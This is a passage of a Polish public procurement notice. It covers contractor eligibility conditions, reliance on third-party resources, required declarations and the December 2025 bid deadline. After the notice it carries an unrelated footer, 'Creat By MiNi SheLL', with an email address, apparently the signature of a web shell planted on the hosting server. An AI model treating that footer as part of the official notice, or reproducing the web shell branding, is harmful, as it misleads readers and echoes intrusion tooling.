1. O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu; <br/>2)	spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu oraz niniejszej specyfikacji warunków zamówienia.<br/>2. Warunki udziału w postępowaniu dotyczą:<br/>1)	zdolności do występowania w obrocie gospodarczym,<br/> zamawiający wymaga, aby wykonawcy ubiegający się o udzielenie niniejszego zamówienia byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania.<br/> zamawiający uzna warunek za spełniony jeżeli wykonawca posiada aktualny wpis o prowadzonej działalności, zgodnej z przedmiotem zamówienia w Krajowym Rejestrze Sądowym, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/> zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>Warunek ten zamawiający uzna za spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/> 3)	sytuacji ekonomicznej lub finansowej,<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej,<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3. Postanowienia dotyczące Podmiotów udostępniających zasoby:<br/>1)	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu w stosownych sytuacjach oraz w odniesieniu do niniejszego zamówienia polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych (Podmioty udostępniające zasoby). <br/>2)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>3)	Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji niniejszego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotów. <br/>4)	Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący wykonawcę z tym podmiotem / podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: <br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <br/>5)	Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą, który polega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy.<br/>4. Określone przez Zamawiającego warunki udziału w postępowaniu oraz wymagane środki dowodowe mają na celu ocenę zdolności wykonawcy do należytego wykonania niniejszego zamówienia. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. <br/>5. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie warunków udziału w postępowaniu wspólnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu - wypełnione i podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, stanowi dowód tymczasowo zastępujący wymagane przez<br/>zamawiającego podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę<br/> 2) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 7 - wypełnione i podpisane przez wykonawcę <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz osób do kontaktów z zamawiającym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie warunków udziału w postępowaniu wspólnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zamówieniowa https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com